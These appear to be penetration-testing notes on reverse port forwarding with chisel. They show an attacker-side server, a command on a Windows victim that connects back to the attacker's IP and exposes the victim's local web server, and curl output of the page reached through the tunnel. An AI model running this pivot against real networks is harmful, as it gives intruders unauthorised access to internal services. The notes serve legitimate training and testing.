## Start server(listener) on port 5000
┌─[root@attack]─[~]
└──╼ #chisel server -p 5000 --reverse
2021/11/15 22:35:35 server: Reverse tunnelling enabled
2021/11/15 22:35:35 server: Fingerprint JjhtL3IgjfRmcnsIZHU9Te/7z1Dt2En6LH3aSKRhgdo=
2021/11/15 22:35:35 server: Listening on http://0.0.0.0:5000


## On victim, this will initiate a connection to server.
## Port 80 from victim will be forwarded to port 8888 on attacker.
C:\myshare\chisel>chisel.exe client 192.168.179.128:5000 R:8888:127.0.0.1:80
2021/11/15 22:43:46 client: Connecting to ws://192.168.179.128:5000
2021/11/15 22:43:46 client: Connected (Latency 604.5µs)


## To browse target port 80 on attacking machine, just visit port localhost port 8888.
┌─[root@attack]─[~]
└──╼ #curl -D- -s http://localhost:8888 | head -n20
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2021 14:45:25 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.4.19
X-Powered-By: PHP/7.4.19
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="initial-scale=1, maximum-scale=1" />
<meta name="viewport" content="width=device-width" />
<title>Online Ordering</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="css/reset.css" type="text/css" media="screen" />
<link rel="stylesheet" href="css/layout.css" type="text/css" media="screen" />
<link rel="stylesheet" href="css/jqueryslidemenu.css" type="text/css" media="screen" />
